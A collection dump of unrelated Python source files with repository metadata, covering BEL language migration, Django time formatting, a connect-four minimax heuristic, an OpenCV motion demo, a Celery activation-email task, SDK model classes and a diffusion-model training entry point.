bo.ast.object = convert(bo.ast.object)
return bo.ast
def convert(ast):
"""Convert BEL1 AST Function to BEL2 AST Function"""
if ast and ast.type == "Function":
# Activity function conversion
if (
ast.name != "molecularActivity"
and ast.name in belspec["namespaces"]["Activity"]["list"]
):
print("name", ast.name, "type", ast.type)
ast = convert_activity(ast)
return ast # Otherwise - this will trigger on the BEL2 molecularActivity
# translocation conversion
elif ast.name in ["tloc", "translocation"]:
ast = convert_tloc(ast)
fus_flag = False
for idx, arg in enumerate(ast.args):
if arg.__class__.__name__ == "Function":
# Fix substitution -> variation()
if arg.name in ["sub", "substitution"]:
ast.args[idx] = convert_sub(arg)
elif arg.name in ["trunc", "truncation"]:
ast.args[idx] = convert_trunc(arg)
elif arg.name in ["pmod", "proteinModification"]:
ast.args[idx] = convert_pmod(arg)
elif arg.name in ["fus", "fusion"]:
fus_flag = True
# Recursively process Functions
ast.args[idx] = convert(ast.args[idx])
if fus_flag:
ast = convert_fus(ast)
return ast
def convert_tloc(ast):
"""Convert BEL1 tloc() to BEL2"""
from_loc_arg = ast.args[1]
to_loc_arg = ast.args[2]
from_loc = Function("fromLoc", version=version, parent=ast)
from_loc.add_argument(NSArg(from_loc_arg.namespace, from_loc_arg.value, parent=from_loc))
to_loc = Function("toLoc", version=version, parent=ast)
to_loc.add_argument(NSArg(to_loc_arg.namespace, to_loc_arg.value, parent=to_loc))
ast.args[1] = from_loc
ast.args[2] = to_loc
return ast
def convert_activity(ast):
"""Convert BEL1 activities to BEL2 act()"""
if len(ast.args) > 1:
logger.error(f"Activity should not have more than 1 argument {ast.to_string()}")
p_arg = ast.args[0] # protein argument
print("p_arg", p_arg)
ma_arg = Function("ma", version=version)
ma_arg.add_argument(StrArg(ast.name, ma_arg))
p_arg.change_parent_fn(ma_arg)
ast = Function("activity", version=version)
p_arg.change_parent_fn(ast)
ast.add_argument(p_arg)
ast.add_argument(ma_arg)
return ast
def convert_pmod(pmod):
"""Update BEL1 pmod() protein modification term"""
if pmod.args[0].value in belspec["bel1_migration"]["protein_modifications"]:
pmod.args[0].value = belspec["bel1_migration"]["protein_modifications"][pmod.args[0].value]
return pmod
def convert_fus(ast):
"""Convert BEL1 fus() to BEL2 fus()"""
parent_fn_name = ast.name_short
prefix_list = {"p": "p.", "r": "r.", "g": "c."}
prefix = prefix_list[parent_fn_name]
fus1_ns = ast.args[0].namespace
fus1_val = ast.args[0].value
arg_fus = ast.args[1]
fus_args = [None, "?", "?"]
for idx, arg in enumerate(arg_fus.args):
fus_args[idx] = arg
fus2_ns = fus_args[0].namespace
fus2_val = fus_args[0].value
if fus_args[1] == "?":
fus1_range = fus_args[1]
else:
fus1_range = f'"{prefix}1_{fus_args[1].value}"'
if fus_args[2] == "?":
fus2_range = fus_args[2]
else:
fus2_range = f'"{prefix}{fus_args[2].value}_?"'
fus = Function("fus", version=version, parent=ast)
fus.args = [
NSArg(fus1_ns, fus1_val, fus),
StrArg(fus1_range, fus),
NSArg(fus2_ns, fus2_val, fus),
StrArg(fus2_range, fus),
]
# Remove BEL
ast_args = ast.args
ast_args.pop(0)
ast_args.pop(0)
if ast_args == [None]:
ast_args = []
ast.args = []
ast.add_argument(fus)
if len(ast_args) > 0:
ast.args.extend(ast_args)
return ast
def convert_sub(sub):
"""Convert BEL1 sub() to BEL2 var()"""
args = sub.args
(ref_aa, pos, new_aa) = args
parent_fn_name = sub.parent_function.name_short
prefix_list = {"p": "p.", "r": "r.", "g": "c."}
prefix = prefix_list[parent_fn_name]
new_var_arg = f'"{prefix}{belspec["namespaces"]["AminoAcid"]["to_short"][ref_aa.value]}{pos.value}{belspec["namespaces"]["AminoAcid"]["to_short"][new_aa.value]}"'
new_var = Function("var", version=version)
new_var.add_argument(StrArg(new_var_arg, new_var))
return new_var
def convert_trunc(trunc):
"""Convert BEL1 trunc() to BEL2 var()"""
parent_fn_name = trunc.parent_function.name_short
prefix_list = {"p": "p.", "r": "r.", "g": "c."}
prefix = prefix_list[parent_fn_name]
new_var_arg = f'"truncated at {trunc.args[0].value}"'
new_var = Function("var", version=version)
new_var.add_argument(StrArg(new_var_arg, new_var))
return new_var
def main():
# Local
import bel.lang.migrate_1_2
bel1 = "kin(p(HGNC:BRAF))"
bel1 = "p(HGNC:PIK3CA, sub(E, 545, K))"
# bel2 = 'p(HGNC:PIK3CA, var(p.Glu545Lys))'
bel1 = "r(HGNC:BCR, fus(HGNC:JAK2, 1875, 2626), pmod(P))"
bel2 = 'r(fus(HGNC:BCR, "r.1_1875", HGNC:JAK2, "r.2626_?"), pmod(Ph))'
# bel1 = 'p(HGNC:MAPK1, pmod(P, Thr, 185))'
# bel2 = 'p(HGNC:MAPK1, pmod(Ph, Thr, 185))'
# bel1 = 'tloc(p(HGNC:EGFR), MESHCL:Cytoplasm, MESHCL:"Cell Nucleus")'
# bel2 = 'tloc(p(HGNC:EGFR), fromLoc(MESHCL:Cytoplasm), toLoc(MESHCL:"Cell Nucleus"))'
# bel1 = 'p(HGNC:ABCA1, trunc(1851))'
# bel2 = 'p(HGNC:ABCA1, var("truncated at 1851"))'
bel2 = bel.lang.migrate_1_2.migrate(bel1)
print("BEL2", bel2)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
206146ddffedd60bf477a416ab75b3c14e9f720f | 758bf41e46a3093f4923af603f1f7f8063408b9c | /website/testFromRemoteRepo/_bsch3398/museum/python/django/utils/timesince.py | 55e53c65cfc601a4fa7399ed0b4d33d81b8588c3 | [] | no_license | mpetyx/mpetyx.com | 4033d97b21c9227a6ba505980fd0c1b57254e8fb | d50c379b4fe09e0135656573f7049225fc90ae36 | refs/heads/master | 2021-01-10T19:50:15.488371 | 2014-01-22T09:04:14 | 2014-01-22T09:04:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,698 | py | import datetime
from django.utils.tzinfo import LocalTimezone
from django.utils.translation import ungettext, ugettext
def timesince(d, now=None):
"""
Takes two datetime objects and returns the time between d and now
as a nicely formatted string, e.g. "10 minutes". If d occurs after now,
then "0 minutes" is returned.
Units used are years, months, weeks, days, hours, and minutes.
Seconds and microseconds are ignored. Up to two adjacent units will be
displayed. For example, "2 weeks, 3 days" and "1 year, 3 months" are
possible outputs, but "2 weeks, 3 hours" and "1 year, 5 days" are not.
Adapted from http://blog.natbat.co.uk/archive/2003/Jun/14/time_since
"""
chunks = (
(60 * 60 * 24 * 365, lambda n: ungettext('year', 'years', n)),
(60 * 60 * 24 * 30, lambda n: ungettext('month', 'months', n)),
(60 * 60 * 24 * 7, lambda n: ungettext('week', 'weeks', n)),
(60 * 60 * 24, lambda n: ungettext('day', 'days', n)),
(60 * 60, lambda n: ungettext('hour', 'hours', n)),
(60, lambda n: ungettext('minute', 'minutes', n))
)
# Convert datetime.date to datetime.datetime for comparison.
if not isinstance(d, datetime.datetime):
d = datetime.datetime(d.year, d.month, d.day)
if now and not isinstance(now, datetime.datetime):
now = datetime.datetime(now.year, now.month, now.day)
if not now:
if d.tzinfo:
now = datetime.datetime.now(LocalTimezone(d))
else:
now = datetime.datetime.now()
# ignore microsecond part of 'd' since we removed it from 'now'
delta = now - (d - datetime.timedelta(0, 0, d.microsecond))
since = delta.days * 24 * 60 * 60 + delta.seconds
if since <= 0:
# d is in the future compared to now, stop processing.
return u'0 ' + ugettext('minutes')
for i, (seconds, name) in enumerate(chunks):
count = since // seconds
if count != 0:
break
s = ugettext('%(number)d %(type)s') % {'number': count, 'type': name(count)}
if i + 1 < len(chunks):
# Now get the second item
seconds2, name2 = chunks[i + 1]
count2 = (since - (seconds * count)) // seconds2
if count2 != 0:
s += ugettext(', %(number)d %(type)s') % {'number': count2, 'type': name2(count2)}
return s
def timeuntil(d, now=None):
"""
Like timesince, but returns a string measuring the time until
the given time.
"""
if not now:
if getattr(d, 'tzinfo', None):
now = datetime.datetime.now(LocalTimezone(d))
else:
now = datetime.datetime.now()
return timesince(now, d)
| [
"[email protected]"
] | |
df004da63a64bed312c2d45ad9d337333d93d167 | 2160b580f64693eb8a27afc58dbdff9363247e3f | /doc2dash/parsers/__init__.py | 164faf6c4ec769dfc84c4a88ad42ba11ba703c48 | [
"MIT"
] | permissive | pombredanne/doc2dash | fa65fc4428d03c1be9dbdfdb5b311d37c439c3ae | c2f342a74b596d3e0470f9ac69f73c9aef1fc7bd | refs/heads/master | 2021-01-16T19:30:41.265173 | 2014-08-14T08:12:10 | 2014-08-14T08:13:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | from __future__ import absolute_import, division, print_function
from . import pydoctor, sphinx, intersphinx
DOCTYPES = [
intersphinx.InterSphinxParser,
sphinx.SphinxParser,
pydoctor.PyDoctorParser,
]
def get_doctype(path):
"""
Gets the apropriate doctype for *path*.
"""
for dt in DOCTYPES:
if dt.detect(path):
return dt
else:
return None
| [
"[email protected]"
] | |
6cd48226c2b5daa5312ca2232f47327b3926aa63 | 7e6864c5c48317a590ed6cc9b2acb85754bcda3b | /app/bin/back_end_scripts/minimax.py | 7a7839692657faffc8427321758349942d25078c | [
"MIT"
] | permissive | michaelneuder/connect_four | f83d8c1adf03af14632ab1acb23cc79ea5a3f035 | de2a1d7296ffddaee4282b722775225cdfbe6304 | refs/heads/master | 2021-01-20T10:06:56.505978 | 2017-06-05T23:04:34 | 2017-06-05T23:04:34 | 83,929,928 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,084 | py | #!/usr/bin/env python3
import numpy as np
import random as rand
class minimax(object):
def __init__(self, current_board, move_number):
self.board = current_board
self.number_rows = 6
self.number_cols = 7
self.move_number = move_number
self.right_diag_1 = []
self.right_diag_2 = []
self.right_diag_3 = []
self.right_diag_4 = []
self.right_diag_5 = []
self.right_diag_6 = []
self.left_diag_1 = []
self.left_diag_2 = []
self.left_diag_3 = []
self.left_diag_4 = []
self.left_diag_5 = []
self.left_diag_6 = []
self.diag_set = []
self.two_set = []
self.update_diags()
def update_diags(self):
self.right_diag_1 = [self.board[3,0],self.board[2,1],self.board[1,2],self.board[0,3]]
self.right_diag_2 = [self.board[4,0],self.board[3,1],self.board[2,2],self.board[1,3],
self.board[0,4]]
self.right_diag_3 = [self.board[5,0],self.board[4,1],self.board[3,2],self.board[2,3],
self.board[1,4],self.board[0,5]]
self.right_diag_4 = [self.board[5,1],self.board[4,2],self.board[3,3],self.board[2,4],
self.board[1,5],self.board[0,6]]
self.right_diag_5 = [self.board[5,2],self.board[4,3],self.board[3,4],self.board[2,5],
self.board[1,6]]
self.right_diag_6 = [self.board[5,3],self.board[4,4],self.board[3,5],self.board[2,6]]
self.left_diag_1 = [self.board[3,6],self.board[2,5],self.board[1,4],self.board[0,3]]
self.left_diag_2 = [self.board[4,6],self.board[3,5],self.board[2,4],self.board[1,3],
self.board[0,2]]
self.left_diag_3 = [self.board[5,6],self.board[4,5],self.board[3,4],self.board[2,3],
self.board[1,2],self.board[0,1]]
self.left_diag_4 = [self.board[5,5],self.board[4,4],self.board[3,3],self.board[2,2],
self.board[1,1],self.board[0,0]]
self.left_diag_5 = [self.board[5,4],self.board[4,3],self.board[3,2],self.board[2,1],
self.board[1,0]]
self.left_diag_6 = [self.board[5,3],self.board[4,2],self.board[3,1],self.board[2,0]]
self.diag_set = [self.right_diag_1, self.right_diag_2, self.right_diag_3,
self.right_diag_4, self.right_diag_5, self.right_diag_6,
self.left_diag_1, self.left_diag_2, self.left_diag_3,
self.left_diag_4, self.left_diag_5, self.left_diag_6]
def find_twos_rows(self, color):
number_of_twos = 0
'''
checking for twos along the rows. this gets complicated, because we
only want to count twos that could be part of a future connect four.
thus we have to make sure that their is enough empty cells around each
set of two before we count it.
----------------------------------------------------------------------
these are the options: 0011, 0101, 0110, 1001, 1010, 1100
'''
for row in range(self.number_rows):
for col in range(self.number_cols-1):
if( (col-2) > -1 and (col+2 >= self.number_cols or self.board[row][col+2] != color)):
if(self.board[row][col] == self.board[row][col+1] == color
and self.board[row][col-1] == self.board[row][col-2] == 0):
number_of_twos += 1
elif( (col-1) > -1 and (col+2) < self.number_cols ):
if(self.board[row][col] == self.board[row][col+2] == color
and (self.board[row][col-1] == self.board[row][col+1] == 0)):
number_of_twos += 1
elif( (col-1) > -1 and (col+2) < self.number_cols):
if(self.board[row][col] == self.board[row][col+1] == color
and (self.board[row][col-1] == self.board[row][col+2] == 0)):
number_of_twos += 1
elif( (col+3) < self.number_cols):
if(self.board[row][col] == self.board[row][col+3] == color
and self.board[row][col+1] == self.board[row][col+2] == 0):
number_of_twos += 1
elif(self.board[row][col] == self.board[row][col+2] == color
and self.board[row][col+1] == self.board[row][col+3] == 0):
number_of_twos += 1
elif(self.board[row][col] == self.board[row][col+1] == color
and self.board[row][col+2] == self.board[row][col+3] == 0):
number_of_twos += 1
return number_of_twos
def find_twos_rows_test(self, color):
'''
checking for twos along the rows. this gets complicated, because we
only want to count twos that could be part of a future connect four.
thus we have to make sure that their is enough empty cells around each
set of two before we count it.
----------------------------------------------------------------------
these are the options: 0011, 0101, 0110, 1001, 1010, 1100
'''
number_of_twos = 0
set_to_check = []
for row in range(self.number_rows):
for col in range(self.number_cols-3):
set_to_check.append([self.board[row][col+i] for i in range(4)])
for set_ in set_to_check:
num_color = 0
num_empty = 0
for cell in set_:
if(cell == 0):
num_empty += 1
elif(cell == color):
num_color += 1
if(num_color == num_empty == 2):
number_of_twos += 1
return number_of_twos
def find_twos_cols(self, color):
number_of_twos = 0
'''
checking for twos along the col. this is pretty easy as the only way a
two in a row along a column can be apart of a connect four is if the piece
immediately above the two is empty.
'''
for col in range(self.number_cols):
for row in range(self.number_rows):
if(self.board[row][col] == self.board[row-1][col] == color
and self.board[row-2][col] == 0):
number_of_twos += 1
return number_of_twos
def find_twos_diags(self, color):
'''
this is similar to finding twos in rows. there are three options for
two in a rows that have potential to be a win. 0011, 0110, 1100. these
each are examined in the context of the diagonal. this is the reason
that the diagonal lists are necessary
'''
number_of_twos = 0
for diag in self.diag_set:
diagonal_length = len(diag)
for i in range(diagonal_length-1):
if( (i+3) < diagonal_length):
if(diag[i] == diag[i+1] == color and diag[i+2] == diag[i+3] == 0):
number_of_twos += 1
print('found')
elif( (i-1) > -1 and (i+2) < diagonal_length):
if(diag[i] == diag[i+1] == color and diag[i-1] == diag[i+2] == 0):
number_of_twos += 1
print('found')
elif( (i-2) > -1):
if(diag[i] == diag[i+1] == color and diag[i-1] == diag[i-2] == 0):
number_of_twos += 1
print('found')
return number_of_twos
def evaluate_board(self):
# (2 in a rows)*10 + (3 in a rows)*1000 + (4 in a row)*100000
evaluation = 10
return evaluation
def main():
print("\nminimax ai algorithm --- connect four\n")
sample_board = np.array([[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,0,0,0,0,0],
[0,0,2,0,1,2,0],
[0,1,2,1,2,2,2],
[2,1,1,2,1,1,1]])
minimax_ = minimax(sample_board, 16)
print(minimax_.find_twos_rows_test(1))
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
f69504729af79407f2cc3c37688aedfdbe190a0d | 1719920a92f7194766624474b98d59ef8d6eddaf | /models/device_enrollment_configuration.py | 9e22612e3cb2ffb4bf77a9608e129ccf5936870e | [
"MIT"
] | permissive | MIchaelMainer/msgraph-v10-models-python | cfa5e3a65ba675383975a99779763211ed9fa0a9 | adad66363ebe151be2332f3ef74a664584385748 | refs/heads/master | 2020-03-19T12:51:06.370673 | 2018-06-08T00:16:12 | 2018-06-08T00:16:12 | 136,544,573 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,747 | py | # -*- coding: utf-8 -*-
'''
# Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information.
#
# This file was generated and any changes will be overwritten.
'''
from __future__ import unicode_literals
from ..model.enrollment_configuration_assignment import EnrollmentConfigurationAssignment
from datetime import datetime
from ..one_drive_object_base import OneDriveObjectBase
class DeviceEnrollmentConfiguration(OneDriveObjectBase):
def __init__(self, prop_dict={}):
self._prop_dict = prop_dict
@property
def display_name(self):
"""
Gets and sets the displayName
Returns:
str:
The displayName
"""
if "displayName" in self._prop_dict:
return self._prop_dict["displayName"]
else:
return None
@display_name.setter
def display_name(self, val):
self._prop_dict["displayName"] = val
@property
def description(self):
"""
Gets and sets the description
Returns:
str:
The description
"""
if "description" in self._prop_dict:
return self._prop_dict["description"]
else:
return None
@description.setter
def description(self, val):
self._prop_dict["description"] = val
@property
def priority(self):
"""
Gets and sets the priority
Returns:
int:
The priority
"""
if "priority" in self._prop_dict:
return self._prop_dict["priority"]
else:
return None
@priority.setter
def priority(self, val):
self._prop_dict["priority"] = val
@property
def created_date_time(self):
"""
Gets and sets the createdDateTime
Returns:
datetime:
The createdDateTime
"""
if "createdDateTime" in self._prop_dict:
return datetime.strptime(self._prop_dict["createdDateTime"].replace("Z", ""), "%Y-%m-%dT%H:%M:%S.%f")
else:
return None
@created_date_time.setter
def created_date_time(self, val):
self._prop_dict["createdDateTime"] = val.isoformat()+"Z"
@property
def last_modified_date_time(self):
"""
Gets and sets the lastModifiedDateTime
Returns:
datetime:
The lastModifiedDateTime
"""
if "lastModifiedDateTime" in self._prop_dict:
return datetime.strptime(self._prop_dict["lastModifiedDateTime"].replace("Z", ""), "%Y-%m-%dT%H:%M:%S.%f")
else:
return None
@last_modified_date_time.setter
def last_modified_date_time(self, val):
self._prop_dict["lastModifiedDateTime"] = val.isoformat()+"Z"
@property
def version(self):
"""
Gets and sets the version
Returns:
int:
The version
"""
if "version" in self._prop_dict:
return self._prop_dict["version"]
else:
return None
@version.setter
def version(self, val):
self._prop_dict["version"] = val
@property
def assignments(self):
"""Gets and sets the assignments
Returns:
:class:`AssignmentsCollectionPage<onedrivesdk.request.assignments_collection.AssignmentsCollectionPage>`:
The assignments
"""
if "assignments" in self._prop_dict:
return AssignmentsCollectionPage(self._prop_dict["assignments"])
else:
return None
| [
"[email protected]"
] | |
e15ab783b8524095dfce9416304b9b29b70fb815 | f9357dc6ebe6ae1af0b03a9afc5f765706b8d31f | /cv2_functions/cv2_minbox.py | 9614fc7f0d142f6072a8812d1af97c5d594b277c | [] | no_license | cilame/any-whim | 660acd966048655aa36886047fbc232539807881 | 1520accbe1506a133989a6c2be17572e7fb4693e | refs/heads/master | 2023-08-17T05:10:56.348200 | 2023-08-13T16:45:11 | 2023-08-13T16:45:11 | 110,548,292 | 125 | 64 | null | null | null | null | UTF-8 | Python | false | false | 913 | py | import cv2
s = cv2.createBackgroundSubtractorMOG2(varThreshold=100)
f = cv2.VideoCapture(0)
while(1):
a,v = f.read()
g = s.apply(v)
g = cv2.morphologyEx(g,cv2.MORPH_DILATE,(7,7),iterations=7)
a,b,c = cv2.findContours(g,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
for i in b:
#print cv2.minAreaRect(i)
x1,x2,x3,x4 = cv2.boxPoints(cv2.minAreaRect(i))
if sum((x1-x2)**2)>20 and sum((x2-x3)**2)>20:
x1 = tuple(x1)
x2 = tuple(x2)
x3 = tuple(x3)
x4 = tuple(x4)
cv2.line(v,x1,x2,(0,255,0))
cv2.line(v,x2,x3,(0,255,0))
cv2.line(v,x3,x4,(0,255,0))
cv2.line(v,x4,x1,(0,255,0))
#if w>10 and h>10:cv2.rectangle(v,(x,y),(x+w,y+h),(0,255,0),1)
cv2.imshow('nier1',v)
cv2.imshow('nier',g)
if cv2.waitKey(42)==ord(' '):
break
f.release()
cv2.destroyAllWindows()
| [
"[email protected]"
] | |
b58e705deed2f0b8a2254709321b6101b634b952 | fcc6fa7905b6045a68b992c74e5301e00d5dd3d3 | /users/tasks.py | bf40dc7db3c53264f1f01878dcefd90681f297b2 | [] | no_license | alinzel/BookStore | cc394c9935155c7fda29aa105edd1e9914bd94aa | 5dfbf13182ce19dfae4d7f8b443cd8e7a54d1204 | refs/heads/master | 2020-03-07T03:22:18.771701 | 2018-03-29T08:00:19 | 2018-03-29T08:00:19 | 127,233,714 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 795 | py | from __future__ import absolute_import,unicode_literals
from celery import shared_task
from django.conf import settings
from django.core.mail import send_mail
# 发送激活邮件
@shared_task # 共享任务 返回一个总是使用current_app中的任务实例的代理
def send_active_email(token, username, email):
subject = '尚硅谷书城用户激活链接' # 标题
message = '你好' + username # 内容
sender = settings.EMAIL_FROM # 显示的发件人
receiver = [email] # 目的邮箱
# 激活链接
html_message = '<a href="http://127.0.0.1:8000/user/active/%s/">http://127.0.0.1:8000/user/active/</a>'%token
# 发送邮件的链接
send_mail(subject, message, sender,receiver, html_message=html_message)
# TODO 开启celery的命令
# celery -A bookstore worker -l info
| [
"[email protected]"
] | |
230d26e5c2b5c4bc19665857dfe972ec6b36874b | b15d2787a1eeb56dfa700480364337216d2b1eb9 | /accelbyte_py_sdk/api/platform/models/client_request_parameter.py | 9f7b1f469cdc712522fbd02313e75c9d9297b6f3 | [
"MIT"
] | permissive | AccelByte/accelbyte-python-sdk | dedf3b8a592beef5fcf86b4245678ee3277f953d | 539c617c7e6938892fa49f95585b2a45c97a59e0 | refs/heads/main | 2023-08-24T14:38:04.370340 | 2023-08-22T01:08:03 | 2023-08-22T01:08:03 | 410,735,805 | 2 | 1 | MIT | 2022-08-02T03:54:11 | 2021-09-27T04:00:10 | Python | UTF-8 | Python | false | false | 6,030 | py | # Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: ags_py_codegen
# AccelByte Gaming Services Platform Service (4.32.1)
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
from __future__ import annotations
from typing import Any, Dict, List, Optional, Tuple, Union
from ....core import Model
class ClientRequestParameter(Model):
"""Client request parameter (ClientRequestParameter)
Properties:
currency_code: (currencyCode) OPTIONAL str
language: (language) OPTIONAL str
price: (price) OPTIONAL float
region: (region) OPTIONAL str
"""
# region fields
currency_code: str # OPTIONAL
language: str # OPTIONAL
price: float # OPTIONAL
region: str # OPTIONAL
# endregion fields
# region with_x methods
def with_currency_code(self, value: str) -> ClientRequestParameter:
self.currency_code = value
return self
def with_language(self, value: str) -> ClientRequestParameter:
self.language = value
return self
def with_price(self, value: float) -> ClientRequestParameter:
self.price = value
return self
def with_region(self, value: str) -> ClientRequestParameter:
self.region = value
return self
# endregion with_x methods
# region to methods
def to_dict(self, include_empty: bool = False) -> dict:
result: dict = {}
if hasattr(self, "currency_code"):
result["currencyCode"] = str(self.currency_code)
elif include_empty:
result["currencyCode"] = ""
if hasattr(self, "language"):
result["language"] = str(self.language)
elif include_empty:
result["language"] = ""
if hasattr(self, "price"):
result["price"] = float(self.price)
elif include_empty:
result["price"] = 0.0
if hasattr(self, "region"):
result["region"] = str(self.region)
elif include_empty:
result["region"] = ""
return result
# endregion to methods
# region static methods
@classmethod
def create(
cls,
currency_code: Optional[str] = None,
language: Optional[str] = None,
price: Optional[float] = None,
region: Optional[str] = None,
**kwargs,
) -> ClientRequestParameter:
instance = cls()
if currency_code is not None:
instance.currency_code = currency_code
if language is not None:
instance.language = language
if price is not None:
instance.price = price
if region is not None:
instance.region = region
return instance
@classmethod
def create_from_dict(
cls, dict_: dict, include_empty: bool = False
) -> ClientRequestParameter:
instance = cls()
if not dict_:
return instance
if "currencyCode" in dict_ and dict_["currencyCode"] is not None:
instance.currency_code = str(dict_["currencyCode"])
elif include_empty:
instance.currency_code = ""
if "language" in dict_ and dict_["language"] is not None:
instance.language = str(dict_["language"])
elif include_empty:
instance.language = ""
if "price" in dict_ and dict_["price"] is not None:
instance.price = float(dict_["price"])
elif include_empty:
instance.price = 0.0
if "region" in dict_ and dict_["region"] is not None:
instance.region = str(dict_["region"])
elif include_empty:
instance.region = ""
return instance
@classmethod
def create_many_from_dict(
cls, dict_: dict, include_empty: bool = False
) -> Dict[str, ClientRequestParameter]:
return (
{k: cls.create_from_dict(v, include_empty=include_empty) for k, v in dict_}
if dict_
else {}
)
@classmethod
def create_many_from_list(
cls, list_: list, include_empty: bool = False
) -> List[ClientRequestParameter]:
return (
[cls.create_from_dict(i, include_empty=include_empty) for i in list_]
if list_
else []
)
@classmethod
def create_from_any(
cls, any_: any, include_empty: bool = False, many: bool = False
) -> Union[
ClientRequestParameter,
List[ClientRequestParameter],
Dict[Any, ClientRequestParameter],
]:
if many:
if isinstance(any_, dict):
return cls.create_many_from_dict(any_, include_empty=include_empty)
elif isinstance(any_, list):
return cls.create_many_from_list(any_, include_empty=include_empty)
else:
raise ValueError()
else:
return cls.create_from_dict(any_, include_empty=include_empty)
@staticmethod
def get_field_info() -> Dict[str, str]:
return {
"currencyCode": "currency_code",
"language": "language",
"price": "price",
"region": "region",
}
@staticmethod
def get_required_map() -> Dict[str, bool]:
return {
"currencyCode": False,
"language": False,
"price": False,
"region": False,
}
# endregion static methods
| [
"[email protected]"
] | |
5a8d87c8871f4b5879836b466e7049fd661da1ea | ca23b411c8a046e98f64b81f6cba9e47783d2584 | /ncsnv3/main.py | d7a89ddfc89627cb854f233719729e3382012dce | [
"CC-BY-4.0",
"Apache-2.0"
] | permissive | pdybczak/google-research | 1fb370a6aa4820a42a5d417a1915687a00613f9c | 0714e9a5a3934d922c0b9dd017943a8e511eb5bc | refs/heads/master | 2023-03-05T23:16:11.246574 | 2021-01-04T11:30:28 | 2021-01-04T11:30:28 | 326,629,357 | 1 | 0 | Apache-2.0 | 2021-02-01T12:39:09 | 2021-01-04T09:17:36 | Jupyter Notebook | UTF-8 | Python | false | false | 1,580 | py | # coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Training and evaluation for NCSNv3."""
from . import ncsn_lib
from absl import app
from absl import flags
from ml_collections.config_flags import config_flags
import tensorflow as tf
FLAGS = flags.FLAGS
config_flags.DEFINE_config_file(
"config", None, "Training configuration.", lock_config=True)
flags.DEFINE_string("workdir", None, "Work unit directory.")
flags.DEFINE_string("mode", "train", "Running mode: train or eval")
flags.DEFINE_string("eval_folder", "eval",
"The folder name for storing evaluation results")
flags.mark_flags_as_required(["workdir", "config"])
def main(argv):
del argv
tf.config.experimental.set_visible_devices([], "GPU")
if FLAGS.mode == "train":
ncsn_lib.train(FLAGS.config, FLAGS.workdir)
elif FLAGS.mode == "eval":
ncsn_lib.evaluate(FLAGS.config, FLAGS.workdir, FLAGS.eval_folder)
else:
raise ValueError(f"Mode {FLAGS.mode} not recognized.")
if __name__ == "__main__":
app.run(main)
| [
"[email protected]"
] | |
20947ccf802631ec01474e52ab2310cf9b617690 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_redoubtable.py | 8645cb26ee8dbbcd8fcdc345eeb5befad16d369c | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py |
#calss header
class _REDOUBTABLE():
def __init__(self,):
self.name = "REDOUBTABLE"
self.definitions = [u'very strong, especially in character; producing respect and a little fear in others: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
| [
"[email protected]"
] | |
3f96d8878c3bb4206095f84b4f67f59194a2984b | 4af65b44b39816c7037ff928da1ae153f4d970e5 | /mud/thing.py | 37a9732599722b87d944c6e390898be6dba87f1c | [] | no_license | Cloudxtreme/mud-14 | 0745eda694ffeee79120fcfc82aab2da8b7a9655 | f02d4ca0e8360b0924b86a3da99e5230c3028642 | refs/heads/master | 2021-05-28T06:14:37.121028 | 2014-12-01T08:00:27 | 2014-12-01T08:00:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 132 | py | import mudclasses as mc
import event as evt
import english
from types import TupleType
# bug: permanence (sp?) is not yet handled
| [
"[email protected]"
] | |
948cfd26f6231d12a4463589a8d9322ffb687ebf | be5e5aebd753ed1f376dc18ce411f0fac6d2f762 | /natuurpunt_purchase_search/__init__.py | 1503b4c0ebedce5264569792216f47998b67fa9c | [] | no_license | smart-solution/natuurpunt-purchase | 7d9fcfdde769b6294d8dc705cecc99a177b4573c | 0ac94cb68cee4ef464158720e04007ee12036179 | refs/heads/master | 2021-05-22T04:43:21.594422 | 2020-11-02T13:32:27 | 2020-11-02T13:32:27 | 39,186,322 | 0 | 2 | null | 2020-11-02T13:32:28 | 2015-07-16T08:42:31 | Python | UTF-8 | Python | false | false | 926 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
